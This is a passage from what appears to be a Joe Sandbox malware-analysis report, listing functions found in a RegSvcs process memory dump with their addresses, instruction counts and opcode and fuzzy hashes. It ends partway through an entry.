                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DFEC8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |
                                                                                  • API String ID: 0-2343686810
                                                                                  • Opcode ID: fa8b04f86f55ff1e8aeb290aee90cbc6f36f0640448e5a4943c960185bf3dee7
                                                                                  • Instruction ID: 35332fa42f8c13e3844c41fe3e1ae9c1c4f315e5fe06643da7cca4471eb4cff9
                                                                                  • Opcode Fuzzy Hash: fa8b04f86f55ff1e8aeb290aee90cbc6f36f0640448e5a4943c960185bf3dee7
                                                                                  • Instruction Fuzzy Hash: 9521A175F002159FDB54DF78D805B9EBBF5EF88610F00446AE91AD73A0DB359801CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DFED8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |
                                                                                  • API String ID: 0-2343686810
                                                                                  • Opcode ID: f7ab6cfc746dd51568f747dd55cbbe43424f326d3a65575cabe8e872eeb1ee8d
                                                                                  • Instruction ID: f5b3f9fd24e3315acdb9bc7923f4b18beec779dd7a22dcb5897487605d537808
                                                                                  • Opcode Fuzzy Hash: f7ab6cfc746dd51568f747dd55cbbe43424f326d3a65575cabe8e872eeb1ee8d
                                                                                  • Instruction Fuzzy Hash: 5E112B74B002259FDB54EF789815B6EBBF5AF8C610F108469E90AE73A0DB75AD00CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DCF28 Relevance: .8, Instructions: 802COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5ed4602c8014359cacfc532b54f14217e4c759a68782d481fa93d2f656c04284
                                                                                  • Instruction ID: ff4d2cb2ee98628eac8ddd12a90567962b7d5c698772681ae056a461f03d3d05
                                                                                  • Opcode Fuzzy Hash: 5ed4602c8014359cacfc532b54f14217e4c759a68782d481fa93d2f656c04284
                                                                                  • Instruction Fuzzy Hash: 71626034A003168FDB65EB68D990A5EB7B2FF84314F208A68D805DF359DB71ED46CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DACB0 Relevance: .4, Instructions: 388COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8bb7281d05e1b2d13f9d3a69794252cacc231a44ea8519eb844055d5011a7930
                                                                                  • Instruction ID: e6bd51563f0d808373effa87557ed2945f5692cf5dc357b9cbbee657a5b408be
                                                                                  • Opcode Fuzzy Hash: 8bb7281d05e1b2d13f9d3a69794252cacc231a44ea8519eb844055d5011a7930
                                                                                  • Instruction Fuzzy Hash: 0BE16E30E1031A8FDF64EBA8D8906AEB7B2FF85311F148529E805DB395DB359C46CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DB620 Relevance: .3, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9faf502909ab7feae21bdc42e74047e2d43a2618bf550ab918c959b45ae42a75
                                                                                  • Instruction ID: 4e47501ac10caa4ab3af58c0f65bbdc71f16833c0155e59ef8865706b3d552a4
                                                                                  • Opcode Fuzzy Hash: 9faf502909ab7feae21bdc42e74047e2d43a2618bf550ab918c959b45ae42a75
                                                                                  • Instruction Fuzzy Hash: F1A128B4E0020A8BEFB4DB5CD4807ADB7B2FB49310F258526E859EB285D735DC85CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D9130 Relevance: .2, Instructions: 230COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dbb7f15ad51d38c834897abf01352f44b58ba99da284088878dbf60932578efa
                                                                                  • Instruction ID: 762a4fefead4fe82a5a924dd64f128cbc5ee1e5b07860ddedc764b0668f14d87
                                                                                  • Opcode Fuzzy Hash: dbb7f15ad51d38c834897abf01352f44b58ba99da284088878dbf60932578efa
                                                                                  • Instruction Fuzzy Hash: 22913C70B0021A8FDBA4DB69D8507AEB7F6BFC9600F508569D809EB384EB319D419B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D5DC0 Relevance: .2, Instructions: 229COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ade524e0ff1efbee18ca54906214d8231d10043d19e9b00c3e5bfaf3883590c4
                                                                                  • Instruction ID: 27dd167ac9247c290718ddd9562e1036fd1cd5c084141a4f4529a1f9c86dc47b
                                                                                  • Opcode Fuzzy Hash: ade524e0ff1efbee18ca54906214d8231d10043d19e9b00c3e5bfaf3883590c4
                                                                                  • Instruction Fuzzy Hash: 4261D571F001224BDF64AA7DC880A5EBADBEFC4610B254476D80ADB3A0EE65ED4287D5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3E88 Relevance: .2, Instructions: 221COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 073cfb6df8d2b24ff62f224a9e847f075c42bd51480241aa12677a0f90ac0a51
                                                                                  • Instruction ID: 06111b110dd3def171c63aa279f4274af2b367ee20434630f925e4e814ff9340
                                                                                  • Opcode Fuzzy Hash: 073cfb6df8d2b24ff62f224a9e847f075c42bd51480241aa12677a0f90ac0a51
                                                                                  • Instruction Fuzzy Hash: 32810C30B1124A9BDF54DFA9D45475EBBF6BB89300F208529E81AEB385DF35DC428B81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D3E98 Relevance: .2, Instructions: 218COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00e828306359cd694bf1dddeb0b225a18fb112d26f7513bab84bb0038d0d696c
                                                                                  • Instruction ID: 33ddcc5e5a8ce802d11498c8d03978e1a690995cb680f87bf80d23982e08e318
                                                                                  • Opcode Fuzzy Hash: 00e828306359cd694bf1dddeb0b225a18fb112d26f7513bab84bb0038d0d696c
                                                                                  • Instruction Fuzzy Hash: FB811C30B1020A9BDB54DFA9D45075EBBF6BF89300F208529E80AEB384DF35DC428B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D41A4 Relevance: .2, Instructions: 215COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3692e97f30a70d620613fbaf437cb5ed6b975f24ba7fdefc2f5806ec34329fd5
                                                                                  • Instruction ID: bb967b7380812f95fbb6beff28075d21621e99cdb73356b063dd5cdea6378a2b
                                                                                  • Opcode Fuzzy Hash: 3692e97f30a70d620613fbaf437cb5ed6b975f24ba7fdefc2f5806ec34329fd5
                                                                                  • Instruction Fuzzy Hash: 40913B30E106198BDF60DF68C880B9DB7B1FF89314F208699D549BB385DB71AA85CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D41B8 Relevance: .2, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6fb091dc0f1d2fa0d5ab819a776ecb1570a7e69f51d9706603a3ca78a3c4ed15
                                                                                  • Instruction ID: 2752c1ad3bbb447d5fa564275ffa53e663cd11cdc68fecec4f553719c3827ef2
                                                                                  • Opcode Fuzzy Hash: 6fb091dc0f1d2fa0d5ab819a776ecb1570a7e69f51d9706603a3ca78a3c4ed15
                                                                                  • Instruction Fuzzy Hash: 4E913C30E106198BDF60DF68C880B9DB7B1FF89314F208699D549BB385DB71AA85CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DEAF0 Relevance: .2, Instructions: 203COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a056649297d60d7316d3bd03ca3be7136331cc43bd2b6fc225d038abdda0e88c
                                                                                  • Instruction ID: 4df8ee1522e6bf121783baf7d802e77e9ee38d2a6bab0e42e2d5875a2d78194d
                                                                                  • Opcode Fuzzy Hash: a056649297d60d7316d3bd03ca3be7136331cc43bd2b6fc225d038abdda0e88c
                                                                                  • Instruction Fuzzy Hash: 01714C70A002099FDB64EFA9D981A9DBBF6FF84304F248529E415EB395DB34ED46CB40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DEB00 Relevance: .2, Instructions: 201COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcb8e0850a09d5a9aec288019c2e103869eb93906f0347cf7ee070f24c20d008
                                                                                  • Instruction ID: b2953302995f74c2516a9ce7e6ac4bf888e6bf2ba9243522b5663d32b467dd78
                                                                                  • Opcode Fuzzy Hash: fcb8e0850a09d5a9aec288019c2e103869eb93906f0347cf7ee070f24c20d008
                                                                                  • Instruction Fuzzy Hash: 69712A70A002099FDB64EFA9C981A9DBBF6FF84304F248529E405EB395DB30ED46CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D4750 Relevance: .2, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e76368b3420ef72cf6d6fa2de8c660105dead3d5cb998c49594dbe644cd6c509
                                                                                  • Instruction ID: bbb0b8841a656cea97bf9cd0d375d66b6eb7df3830d14907c7a0b1bcb69272d1
                                                                                  • Opcode Fuzzy Hash: e76368b3420ef72cf6d6fa2de8c660105dead3d5cb998c49594dbe644cd6c509
                                                                                  • Instruction Fuzzy Hash: 0B617C30E002089FEF649BA9C9557AEBAF6FB88300F208529E506EB391DF754D458F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DF608 Relevance: .2, Instructions: 171COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aa02a32a9be23910e6b2fa390461fb2c643f528366f8b3ef72eeaa1763dea818
                                                                                  • Instruction ID: c628e65db3abb7645ed7fe36d1966c2888ede320947b6cc224251e80702ec67f
                                                                                  • Opcode Fuzzy Hash: aa02a32a9be23910e6b2fa390461fb2c643f528366f8b3ef72eeaa1763dea818
                                                                                  • Instruction Fuzzy Hash: AF51C334B102249BEFB0666CDC547AF7A5AEBCA751F604426E40BC73D5CF29CC419BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DFC70 Relevance: .2, Instructions: 171COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9590d41feaf28d83bb88e8ce438135e42029f003865e89d7923fbab1128b6dc
                                                                                  • Instruction ID: 7a51afcbc067e66b38f9556707925d184db4f8f566d1a204f2745e148677fa19
                                                                                  • Opcode Fuzzy Hash: b9590d41feaf28d83bb88e8ce438135e42029f003865e89d7923fbab1128b6dc
                                                                                  • Instruction Fuzzy Hash: D151D331E00209DFDB64EF78E8847AEBBB2FF84315F208869E506D7291DB359955CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DF618 Relevance: .2, Instructions: 163COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e8558c0d036e8bd92153a169f82ca12157f7421ccf2dbd2ad2c381b444e545b
                                                                                  • Instruction ID: deee476c400b6e1213a780c63309c826b421a91bb2d137f1f03580832a189544
                                                                                  • Opcode Fuzzy Hash: 4e8558c0d036e8bd92153a169f82ca12157f7421ccf2dbd2ad2c381b444e545b
                                                                                  • Instruction Fuzzy Hash: 6B51C434B102249BEFB466ACD8447AF7A5AE7C9711F604426E40BC77D5CF39CC419BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D44D8 Relevance: .2, Instructions: 160COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a11de219849d277ccd833876e1cf94c6b5eb3c6e5b695528cac303740a214d06
                                                                                  • Instruction ID: 47080c5673638bbd01740b7b74a6ccef8fa0a1cec4c03f311a41525a8c3ee1c7
                                                                                  • Opcode Fuzzy Hash: a11de219849d277ccd833876e1cf94c6b5eb3c6e5b695528cac303740a214d06
                                                                                  • Instruction Fuzzy Hash: 07518B30F102049FEB649BADD984B6EB6E6FF89314F248429E41ADB390CA75DC41CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D9120 Relevance: .2, Instructions: 157COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6292c9e0a58658671826ac02c4906f666997ac3db17663ee68d38785a7bb321d
                                                                                  • Instruction ID: 1db5097debc14ab7c718c3bd2f0786e6b111df924e2497b1313f5054e8ba1e46
                                                                                  • Opcode Fuzzy Hash: 6292c9e0a58658671826ac02c4906f666997ac3db17663ee68d38785a7bb321d
                                                                                  • Instruction Fuzzy Hash: 12513E30B112069FDB94EB78D850BAE77F6FBC9640F508569D80ADB384EB319D029B91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D4740 Relevance: .1, Instructions: 138COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1aa5e64e3beb9c43968f0761c0d58083b12c3e29cb4addc72d047158419b511e
                                                                                  • Instruction ID: e69023873be4d444b2aa3b4662cbd9f2124ac5b666109bc75cc4d04081cb14ec
                                                                                  • Opcode Fuzzy Hash: 1aa5e64e3beb9c43968f0761c0d58083b12c3e29cb4addc72d047158419b511e
                                                                                  • Instruction Fuzzy Hash: 0E518F70B002089FEB549FA9C855BAEBBF6FF88300F208529E505EB395DF759C059B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D5008 Relevance: .1, Instructions: 126COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b496791654771014d9f97174292b5b92983a1bd611e7b51efabb5803a1cd1f2
                                                                                  • Instruction ID: d63d4580e651f62db4845a0c3b1687761dc175e0af05ce89912c2d2b208287e0
                                                                                  • Opcode Fuzzy Hash: 4b496791654771014d9f97174292b5b92983a1bd611e7b51efabb5803a1cd1f2
                                                                                  • Instruction Fuzzy Hash: 93414E31E0060A8FDF70CE99D880BAFF7B5FB84354F10492AE156D7690E735A9458BD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DDAB0 Relevance: .1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b022b4975d424086a1267ff2acbdec19dd0e602858929530e27033f0895e1ede
                                                                                  • Instruction ID: be47ecf15d20a07c1e82789ab0eca282e09ccfaecdc4848844fd2cd2e57ec84e
                                                                                  • Opcode Fuzzy Hash: b022b4975d424086a1267ff2acbdec19dd0e602858929530e27033f0895e1ede
                                                                                  • Instruction Fuzzy Hash: 69415E30E003099FEB64DF69C95479EBBB2BF85744F208A29D806EB280DB75D945CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DDA9D Relevance: .1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3da6c5f452ed467be1d194acc182e3e58791d9db5999804e22189f84b1ac16de
                                                                                  • Instruction ID: 3634225e5da76278af3526931cabcd2d76fa3c48a278ca0329175333e21b60fc
                                                                                  • Opcode Fuzzy Hash: 3da6c5f452ed467be1d194acc182e3e58791d9db5999804e22189f84b1ac16de
                                                                                  • Instruction Fuzzy Hash: F6417F30E043499FEB25DF69D98079EBBB2BF85204F208629D806DB280DB75D946CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D44C8 Relevance: .1, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c8a4abbe63b602258be5c7966c88d751b05e8d5a50aef94b6f427c067dd6f8b
                                                                                  • Instruction ID: 594753d77d3ccbbb368bc8d4c5da2d007308701e80cdae095a0a210c558f65f7
                                                                                  • Opcode Fuzzy Hash: 7c8a4abbe63b602258be5c7966c88d751b05e8d5a50aef94b6f427c067dd6f8b
                                                                                  • Instruction Fuzzy Hash: EF416830E101048FDB64DBA9D498B6EBBF2FF89304F248469E41AEB391CA75DC41CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D21BD Relevance: .1, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e739d3d4babc41368ee48e9c4b372a6b113db793fcd2aae767a40b701e654f1e
                                                                                  • Instruction ID: 10de5eb53c77407b8328e3b3a9894efc4ef84711a4174c59c8a7700d51038042
                                                                                  • Opcode Fuzzy Hash: e739d3d4babc41368ee48e9c4b372a6b113db793fcd2aae767a40b701e654f1e
                                                                                  • Instruction Fuzzy Hash: DB31EF30B002058FEB69AB78C95476F7BA2BF85614F248528D902DB391EF35CE41CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D21D0 Relevance: .1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ff3b793bb9c4d5194332258c04b8fec36deb0967c728eaa0f4a934248594789e
                                                                                  • Instruction ID: 983090020c0af22e4cfab9934175c594e39686acc4d867b59eb4815a7e630baa
                                                                                  • Opcode Fuzzy Hash: ff3b793bb9c4d5194332258c04b8fec36deb0967c728eaa0f4a934248594789e
                                                                                  • Instruction Fuzzy Hash: DF31CD30B002058FEB69AB78C91476F7BA2BFC9604F208528D902DB391EF35CE41CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065DD950 Relevance: .1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4477b322cdc90ec7946bf5daaeb643fbdc61c0c0d81d8f69e213a6a12d63dc9d
                                                                                  • Instruction ID: 9cd545d7e8c55fd7a6cd2df4050f5b3be3a04cd9e8b56e3d312dcc7f19733983
                                                                                  • Opcode Fuzzy Hash: 4477b322cdc90ec7946bf5daaeb643fbdc61c0c0d81d8f69e213a6a12d63dc9d
                                                                                  • Instruction Fuzzy Hash: 2531A330E1071A9BDF24DF68C890ADEBBB5FF85344F108629E805EB244DB71E946CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D2080 Relevance: .1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_65d0000_RegSvcs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9e01830c2ffd677ac222109774d7d7602a27e6e459520000f692771e2957821b
                                                                                  • Instruction ID: 3a1fd2b9142f8f565e02df4eb58a7bc92471e1883835634fce24dcfc20a8027a
                                                                                  • Opcode Fuzzy Hash: 9e01830c2ffd677ac222109774d7d7602a27e6e459520000f692771e2957821b
                                                                                  • Instruction Fuzzy Hash: DE316F34E10609DBDB55DFA8D89469EBBB2BF89300F10C519E906E7390DF71AD46CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 065D2090 Relevance: .1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2794484168.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
